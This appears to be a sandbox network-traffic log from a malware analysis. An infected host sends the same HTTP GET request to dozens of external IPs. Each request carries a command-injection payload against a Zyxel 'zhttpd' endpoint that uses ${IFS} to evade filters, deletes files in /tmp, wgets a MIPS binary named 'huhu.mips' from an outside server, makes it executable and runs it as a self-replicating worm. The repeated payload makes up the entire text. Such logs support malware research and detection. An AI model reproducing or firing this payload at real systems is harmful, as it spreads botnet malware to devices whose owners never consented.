                                              Jan 29, 2024 07:03:46.952116013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3655192.168.2.143925485.180.239.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952138901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3656192.168.2.1437368120.183.183.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952172041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3657192.168.2.143687657.187.228.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952233076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3658192.168.2.1433532166.1.160.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952266932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3659192.168.2.145799639.11.86.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952290058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3660192.168.2.1443880144.160.33.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952332020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3661192.168.2.1454924124.250.95.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952379942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3662192.168.2.1438240148.24.12.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952424049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3663192.168.2.144353018.96.91.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952456951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3664192.168.2.1435222154.79.67.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952486038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3665192.168.2.1440060182.237.216.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952537060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3666192.168.2.143815292.87.228.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952565908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3667192.168.2.1443074137.212.101.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952613115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3668192.168.2.1438250123.222.57.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952641964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3669192.168.2.145173447.60.117.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952677011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3670192.168.2.1439804133.27.130.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952718019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3671192.168.2.143638223.230.140.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952773094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3672192.168.2.1453220195.238.147.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952783108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3673192.168.2.1441694184.122.16.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952830076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3674192.168.2.1450986140.251.171.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952891111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3675192.168.2.1448632136.21.95.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952908993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3676192.168.2.145786877.175.63.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952948093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3677192.168.2.143423473.136.220.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952991962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3678192.168.2.145422847.25.248.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953027010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3679192.168.2.1439930206.169.112.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953053951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3680192.168.2.144054259.115.204.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953088045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3681192.168.2.144874293.193.52.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953121901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3682192.168.2.1453128106.157.232.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953144073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3683192.168.2.1439590189.67.67.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953186989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3684192.168.2.143506837.21.138.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953222036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3685192.168.2.143574286.46.11.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953277111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3686192.168.2.144949644.51.176.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953315020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3687192.168.2.1448176130.157.198.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953350067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3688192.168.2.144396683.202.43.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953380108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3689192.168.2.1459432100.208.222.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953418016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3690192.168.2.1456334207.48.126.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953449011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3691192.168.2.14386628.68.40.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953505039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3692192.168.2.145274818.195.85.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953553915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3693192.168.2.143861282.133.218.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953622103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3694192.168.2.143445847.70.106.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953660011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3695192.168.2.1436800167.173.67.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953684092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3696192.168.2.1437460189.53.226.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953706026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3697192.168.2.1454280107.19.23.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953768969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3698192.168.2.1446890105.166.197.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953830004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3699192.168.2.14568204.37.171.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953849077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3700192.168.2.1434954194.160.68.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953880072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3701192.168.2.1450856120.124.143.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953903913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3702192.168.2.1441600164.13.25.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953952074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3703192.168.2.1443640221.93.109.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.953973055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3704192.168.2.1437388101.93.211.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954027891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3705192.168.2.1459758162.4.64.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954060078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3706192.168.2.1441440141.230.24.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954092026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3707192.168.2.1459256194.5.183.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954144001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3708192.168.2.145981673.85.47.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954184055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3709192.168.2.1458054119.174.31.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954214096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3710192.168.2.145970018.198.27.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954252005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3711192.168.2.145976449.176.153.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954293013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3712192.168.2.143746467.99.92.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954332113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3713192.168.2.1459620170.253.131.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954364061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3714192.168.2.1445798132.10.215.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954387903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3715192.168.2.143820294.40.112.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954433918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3716192.168.2.144097489.204.141.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954478979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3717192.168.2.144478087.229.100.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.954507113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3718192.168.2.14413128.228.87.77443
                                              TimestampBytes transferredDirectionData
